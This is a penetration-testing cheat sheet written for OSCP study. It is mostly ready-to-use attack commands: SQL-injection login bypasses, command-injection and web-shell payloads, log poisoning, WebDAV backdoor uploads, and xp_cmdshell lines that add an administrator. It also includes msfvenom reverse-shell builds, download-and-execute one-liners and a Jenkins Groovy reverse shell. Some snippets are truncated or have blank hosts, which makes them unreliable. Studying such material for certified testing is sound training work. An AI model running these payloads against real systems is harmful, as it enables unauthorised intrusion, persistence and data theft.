Penetration Testing Cheat Sheet

While Studying for OSCP from various sources, I took notes and made a quick cheat sheet so that I don’t need to search for the same thing repeatedly. I am sharing this cheat sheet as I think it might be helpful for someone.

Note: If you need more help or have questions, mail me, or follow me on Twitter:

Enumeration is the key to OSCP

Enumeration is the most important part. All findings should be noted for future reference. Without enumeration, we will have a hard time exploiting the target.

Basic Enumeration

Whenever I start pen-testing an IP address, My First starting favorite tool is Nmap. While Nmap keeps scanning,
On the other side using the browser I try connecting to some common ports like firefox

Port Scanning & Service identifying

#Scan for all ports
$ nmap -vvv -Pn -p- -oN allports $target
#Scan for quick UDP ports
$ nmap -sU -v -oN udpPorts $targets

Filter all open ports for Nmap script scanning:

$ grep '/tcp' allports | awk -F "/" '{print $1}'| tr '\n' ',';echo
#copy and paste the ports list to nmap '-p' and scan
$ nmap -sC -sV -p 1,2,3,4 -oN scriptscan $target

Automated Enumeration Script


./ $target_ip All

Other Interesting tools

binwalk <image>
strings -n 8 <image/file>
steghide info <image>
strace <file>
ltrace <file>
file <file>
ls -la <file>

Pentesting Specific Service

If we have found some ports open, we can use the below methods to enumerate them!

Port 21(FTP)

Scan FTP with Nmap

nmap -vvv -sC -p21 $target<

Login and Upload backdoor

ftp $target
ftp> USER anonymous
ftp> PASS [email protected]
ftp> binary
ftp> upload path/file_name.ext

Port 22(SSH)

Banner Grab

ssh root@target

Quick Brute Forces

hydra -l root -P wordlist ssh://target_ip

Port 25(SMTP)

Username Enumeration. Useful for brute forcing

$ nc $target 25
VRFY username

Port 53(DNS)

Forward Lookup:

for dns in $(cat namelist.txt);do host $;done|grep "has address"

Reverse Lookup:

for adr in $(seq 164 167); do host $ip.$adr;done|grep "pointer"

Test for a Zone transfer from your Kali machine

$ host -t ns name server name server name server name server

#Zone Transfer. If enabled, should list address!
$ host -l 
Using domain server: 

; Transfer failed.

$ dnsrecon -d -t axfr #Zone Transfer
dnsenum -f namelist.txt #brute force domain name


Enumerate using nslookup,dig, and gobuster:

$ nslookup
>server $target_ip
>$target_ip        name = ns1.cronos.htb.

$ dig axfr cronos.htb @
$ gobuster dns -d cronos.htb -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt 

Other tools to try:

host -l target name_server #Zone Transfer
dnsrecon -d -t axfr #Zone Transfer
dnsrecon -d -D ~/words.txt -t brt #brute force domain.
dnsenum target #Zone transfer

Port 79(Finger)

If the finger service is running, it is possible to enumerate usernames.

nmap -vvv -Pn -sC -sV -p79 $target

Port 80/443(HTTP/HTTPS)

What to check?

  1. Manually Browse the links.
  2. Identify used Technology. Search for Vulnerability with identified info.
  3. Gather information from SSL.
  4. Check if it has any proxy-related vulnerabilities.
  5. Brute force for Directory, Sensitive files.
  6. Check for hidden parameters.
  7. Find all input points.
  8. Find subdomains.

View HTML sources, and also Browse Manually


Identify Technology using whatWeb

whatweb -a 3 $target

Scan using Nikto

nikto -h $target

If any CMS identified

wpscan --url http://$target -e p,t,u --detection-mode aggressive &gt; wpscan.log #For wordpress scanning
wpscan -e vp --plugins-detection aggressive --api-token API_KEY --url #Scan for vulnerable plugins with API
droopescan scan drupal http://$target -t 32 # if drupal found
joomscan --ec -u $target #if joomla found

Brute Force Directory and Files

  1. First, use a small common wordlist
  2. Then Big Word list
  3. Try with CMS-related wordlist

Word list File in Kali Linux:


Brute force directory and files using Gobuster:

#scan only for directory
gobuster dir -u http://host/ -t 15 -w /usr/share/dirb/wordlists/common.txt 

#Scan for directory, and files extension of php,txt or conf
gobuster dir -u http://host/ -t 15 -w /usr/share/dirb/wordlists/common.txt -x .php,.txt,.conf

#ignore Certificate check  
gobuster dir -u https://host/ -t 15 -w /usr/share/dirb/wordlists/common.txt -x .php,.txt,.conf -k 

Password brute Forcing(wordpress example) using Hydra:

hydra -L lists/usrname.txt -P lists/pass.txt localhost -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

If the URL parameter as file name, we can try to vulnerability for LFI/RFI.
We should request an invalid file and see if any error is displayed!

#target url
# Display any Error? We may get error by requesting invalid file, like: Warning: include(files/ninevehNotes): 
failed to open stream: No such file or directory in /var/www/html/direcotry/note.php on line 21



#May need to try different way to find the exploit:

#Remote file Inclusion!
LFI Can execute code!
#Find or guess where the logs files are exist, such as:

Modify the User-agent of the header and send using CURL or Burpsuite or even Netcat:

User-Agent: bytefellow: <?php system($_GET['cmd']); ?>

Now execute the command:

Command Execution

If found any parameters or input fields, we can try for command execution.
Test Every parameter and input field with these payloads (Better to use burp suite intruder):

#For Linux
;netstat -a;
#For Windows
| dir
; dir
& dir
&& dir
| dir C:\
; dir C:\
& dir C:\
&& dir C:\
dir C:\
| dir C:\Documents and Settings*
; dir C:\Documents and Settings*
& dir C:\Documents and Settings*
&& dir C:\Documents and Settings*
dir C:\Documents and Settings*
| dir C:\Users
; dir C:\Users

Reference and more payload:

SQLi for Login Bypass

If any login page is found should be tried to bypass the password check.
These payloads were copied from:

' '
'' ' or ''-' ' or '' ' ' or ''&' ' or ''^' ' or '''
" "
"" " or ""-" " or "" " " or ""&" " or ""^" " or """
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#

Useful Cheat Sheet:

Exploiting WebDav

If one method fails, another should be tested. If nothing works, Find a different exploit!

Method 1:

davtest -url http://$target/webdav
cadaver http://$target/webdav
> put test.php

Method 2:

cp /usr/share/webshells/php/simple-backdoor.php bytef.php
curl -T 'bytef.php' 'http://ip/webdav/'

Method 3:

nmap -p 80 $ip_address –script http-put –script-args http-put.url=’/webdav/bytef.php’,http-put.file=’backdoor/bytef.php’


  1. File Inclusion
  2. SQL Injection
  3. Command Injection

Port 110(POP3)

Found a user login information?

$ nc -vvv $target 110
USER test
PASS test

#list all mails

#Retrive the mail
retr mail_number

Port 111 (RPCINFO)

Connect with Null session.

nmap -v -p 111 --script=nfs* $ip
rpcclient -U "" $target
rpcclient $> enumdomusers
rpcclient $> queryuser 0xrid_ID

Port 137,138,139

nmblookup -A <IP>
nbtscan <IP>/30
sudo nmap -sU -sV -T4 --script nbstat.nse -p137,138,139 -Pn -n <IP>

Port 445(SMB)

There is a big chance of getting sensitive information with SMB!

Enumerating SMB

nmap -v -p 139,445 --script=smb-os-discovery smb-ls smb-enum-users smbenum-shares smb-enum-sessions smb-system-info $ip

#Scan for Vulnerability
nmap -v -p 139,445 --script=smb-vuln-* --script-args=unsafe= $ip

#Other tools
enum4linux -a $target
smbmap -h $target
smbclient -L -N //$target 
smbclient -L -U username //$ip

Connecting to share without a password(Anonymous login)

smbclient -N //$ip/share
&gt;recurse on
&gt;prompt off
&gt;cd directory
&gt;mget directory

Login with Password

smbclient -U username //$ip/share

Port 389(LDAP)

ldapsearch -h $ip -x -s base namingcontexts
ldapsearch -h $ip -x -b "DC=cascade,DC=local" '(objectClass=person)' > persons

Port 1433(MSSQL)


nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>

brute force for the “SA” password

hydra -l sa -P password.txt -V $ip mssql

Connect to MSSQL Server:

sqsh -S server_address -U sa -P password

Enable xp_cmdshell:

exec sp_configure 'show advanced options', 1
exec sp_configure 'xp_cmdshell', 1

Execute System Command:

xp_cmdshell 'net user byte bytepass /add'
xp_cmdshell 'net localgroup Administrators byte /add'
xp_cmdshell 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'

Port 2049(NFS)

Enumerate shares

nmap -v -p 2049 --script=nfs* $ip
showmount -e $ip
showmount -a $ip

Mount shares in Kali Machine

mount -t nfs -o vers=2 target_ip:/home local_folder/ -o nolock

After mounting the filesystem if we don’t have read/write permission, we need to edit /etc/passwd and change UUID:

root@kali:/home/bytef//nfs# adduser pwn
Adding user `pwn' ...
Adding new group `marcus' (1001) ...
Adding new user `marcus' (1001) with group `marcus' ...
Creating home directory `/home/pwn' ...
Copying files from `/etc/skel' ...
New password: 
Retype new password: 
passwd: password updated successfully
Changing the user information for pwn
Enter the new value, or press ENTER for the default 
        Full Name []: 
        Room Number []: 
        Work Phone []: 
        Home Phone []: 
        Other []: 
Is the information correct? [Y/n] y
root@kali:/home/bytef/nfs# nano /etc/passwd
root@kali:/home/bytef/nfs# su pwn

Now we can write files to the target folder of the network filesystem. For example:

pwn@kali:/home/bytef/nfs/pwn$ ssh-keygen                                                                                                                                                
Generating public/private rsa key pair.                                                                                                                                                                      
Enter file in which to save the key (/home/pwn/.ssh/id_rsa): /home/bytef/pwn/.ssh                                                                                                   
Enter passphrase (empty for no passphrase):                                                                                                                                                                  
Enter same passphrase again:                                                                                                                                                                                 
Your identification has been saved in /home/bytef/nfs/pwn/.ssh                                                                                                                             
Your public key has been saved in /home/bytef/nfs/pwn/                                                                                                                             
The key fingerprint is:                                                                                                                                                                                      
SHA256:/PH2zrnWxuuT18DFMZvN7WGS7ltUKdz4N+iYjTEZYiQ4 pwn@kali                                                                                                                                               
The key's randomart image is:                                                                                                                                                                                
+---[RSA 3072]----+                                                                                                                                                                                          
|         . .     |                                                                                                                                                                                          
|      E . o      |                                                                                                                                                                                          
|       o o       |                                                                                                                                                                                          
|       .o .     o|                                                                                                                                                                                          
|        S..    *o|                                                                                                                                                                                          
|         .oo. oo%|
|         +. o+ &X|
|          o.+o=O@|
|           . BX*B|

Port 3306(MYSQL)

nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,
mysql-variables,mysql-vuln-cve2012-2122 <IP>

Port 3389(RDP)

Connect to RDP

xfreerdp /u:username /p:password /cert:ignore /v:MACHINE_IP

Quick Brute force if a valid username is found:

hydra -l username -P /usr/share/wordlists/rockyou.txt -t 5 -V ip_address rdp

Add user to RDP Group

net localgroup "Remote Desktop Users" username /add

Port 5900/5800(VNC)

Scan with Nmap

nmap -sV --script vnc-info,realvnc-auth-bypass,vnc-title -p 5900,5800 $ip

Connect using vncviewer from Kali

vncviewer [-passwd passwd.txt] <IP>::5901

Password Attack

Sometimes we need to do password guessing(We should!). For a better success rate we need a good password dictionary.
Also, we should search for default credentials online!

I have collected some usernames and passwords for quick brute force, usually used for CTF.
These lists could be used to exploit weak passwords. Uploaded in GitHub:

Common Username
Common Password

Common password


Generate Password using cewl

cewl -m 2 -d 5 -a -w pass1.txt http://$ip_address/dir/index.php

Brute Force using Burp

If it is a web form we can brute force in intruder and match grep. Some screenshots from the burp suit:

To brute force web form with the hydra, we need to grab the post data from the burp suite carefully.
Otherwise, we will get false positives and waste lots of time! I tried to brute force otrs and it worked.

Brute Force using Hydra

hydra -l root@localhost -V -P pass1.txt $ http-form-post "/^USER^&Password=^PASS^:F=Login failed! Your user name or password was entered incorrectly.:H=Cookie: OTRSBrowserHasCookie=1"
hydra -l root@localhost -V -P pass1.txt $ http-form-post "/^USER^&Password=^PASS^:F=Login failed!"

Vulnerability and Exploitation

We have enumerated our target. Now Find vulnerabilities!

Find Vulnerability using Nmap

nmap -Pn -p 80,139,445,21 --script vuln $target

Using Searchsploit

#update database
searchsploit -u
#Searching variation
searchsploit afd windows local
searchsploit kernel 2.6
searchsploit oracle windows

#this will copy the exploit to current directory
searchsploit -m exploit_id 

Find Exploits using Google

Three kinds of search should be enough to find a working exploit

service_version Exploit
site: service_version exploit
site: service_version exploit

Working with Public Exploits

A public exploit might be coded in Python, ruby, c/c++, or any other language. Before executing the exploit:

  • Read the instruction Carefully.
  • Edit Target address, Reverse connection IP, and Ports.

Working with Shell

We have exploited the vulnerability and got the shell. Now what? Upgrade shell? Privilege escalation? Fix the shell issue?

Backdoor Files in Kali

Kali already has some web shells.


Quick Shell in Different language

Here it is:

<?php system("whoami"); ?>
<?php system($_GET['cmd']); ?>
<?php echo exec("whoami");?>

Generate using msfvenom

#Staged windows Payload
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x86.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x64.exe

#Stageless Windows payload
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > reverse-x86.exe

#Linux Stageless Payload
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x86.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x64.elf

#Linux Staged Payload
msfvenom -p linux/x86/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x86.elf
msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > reverse-x64.elf

#Other Platform
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > reverse.php
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > reverse.war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > reverse.jsp
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > reverse.asp

#Generate powershell payload
msfvenom -p windows/x64/powershell_reverse_tcp -o psh.ps1 -a x64 --platform windows LHOST= LPORT=8080

#Generate Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f

Upgrading Shell

Listening for Connection

nc -lvp 1337

Upgrade your unstable shell!

python3 -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo
export TERM=xterm

#First check in normal terminal stty -a to get rows and cols number, then run below command
stty rows 52 cols 195

Running Python 3 HTTP Server

#Python 3
python3 -m http.server
#python 2
python -m SimpleHTTPServer

Uploading Shell/File

After getting the shell, we may need to upload additional files or a stable backdoor.

Start HTTP server in Kali:

python3 -m http.server

If the target OS is Linux:

wget http://host:8000/file.bin -O /dev/shm/filename.bin
curl http://host:8000/file.bin -o /dev/shm/filename.bin

If the target OS is Windows:

#Download and Execute powershell script
powershell.exe -c iex(new-object net.webclient).downloadstring('')

(New-Object Net.WebClient).DownloadFile("http://host/shell.exe","C:\Windows\Temp\shell.exe")
Invoke-WebRequest "http://host/shell.exe" -OutFile "shell.exe"
powershell.exe -c Invoke-WebRequest -OutFile shell.exe

certutil -urlcache -split -f c:\windows\Temp\shell.exe && c:\windows\Temp\shell.exe

#Transfer with SMB Share. Attacker machine SMB server should be running
copy //host/shell.exe /path/shell.exe

Transfer file using impacket samba script:

#In kali start SMB Server
python3 byte /home/bytef/files

#on the victim machine view the share name
net view \\kali_ip
net use \\\byte

#copy the file from shared folder
copy \\kali_ip\byte\file.ext file.ext

Pivot/Tunnel/Port Forwarding

Port forward is required when we can’t access a specific service or other internal machines from our Kali machine!

Local Port Forwarding

Have SSH access with low privileges? and There are some ports open internally? Try Local Port Forwarding.

  1. -L = Kali’s Port
  2. -R = Kali Port
  3. $ip:3306 is the port from the target
ssh –L 3306:$ip:3306 user@$target_ip

Remote Port Forwarding

No SSH Access but limited shell? Also, some weird port is open? Upload plink and Try Remote port forward with plink

ssh –R 3306:localhost:3306 root@kali_ip
ssh –R 3306:localhost:3306 -o "UserKnownHostFile=/dev/null" -o "UserHostKeyChecking=no" root@kali_ip

Connect to the tunneled port:

#Verify with nc
nc -vvv localhost 3306

#If mysql
mysql -u username -p -h -P 3306 

Dynamic Port Forwarding(Socks4)

Dynamic Port Forwarding from victim machine(Socks Proxy):

ssh -D 8080 -f -N user@$target_ip

With Dynamic Port Forwarding We can access/browse any ip range of the victim machine.
We just need to configure proxychains.conf as follows:

nano /etc/proxychains.conf
socks4 8080

Now we can use any application through proxychains, like:

proxychains firefox
proxychains nmap -sT -Pn -p139,445 $ip

Remote Port Forwarding using Plink. Needed When we don’t have access to a specific port on the target box!

plink.exe -ssh -l kali_user -pw kali_password -R $kali_ip:445: $kali_ip

Common Issue

During playing the ctf I had to fix some problems!

Permission issue for SSH Private Key?

chmod 600 id_rsa

Load key “id_rsa”: invalid format?

Try Removing the blank space. Also, keep the public key in the same directory as the private key.
We may get the warning, but it should work!

Unable to negotiate with x.x.x.x

SSH Error:

Unable to negotiate with x.x.x.x port 22: no matching key exchange method found. 
Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1


ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c 3des-cbc [email protected]

Practical Exploitation

Here is some example of exploitation!

Exploiting NFS and FTP

I have done enumeration with nmapautomator. Found NFS and ProFtpd 1.3.5 is running. But no HTTP. The exploitation step was:

showmount -e 172.31.122
mount -o default nfss/
ls nfss

The network File system is mounted but does not have any contents. The FTP version is vulnerable.
So I had to exploit it manually(

nc -vvv 21
ftp>site cpfr /home/daniel
cat nfss/daniel/.ssh/id_rsa
cat nfss/daniel/.ssh/
ssh -i id_rsa [email protected]

This way, I was able to successfully exploit the system without directly using any tools!

Exploiting Jenkins Server

Was able to log in as user admin and password admin. Then I navigated to Manage Jenkins>>Script Console and pasted this code for reverse connection:

String host="";
int port=1337;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(;while(pe.available()>0)so.write(;
try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

I clicked run and got shell!

More Example:

Follow Me

Note: If you find this cheat sheet helpful, please share it everywhere! And if you want to connect with me, follow my Facebook page and put a review: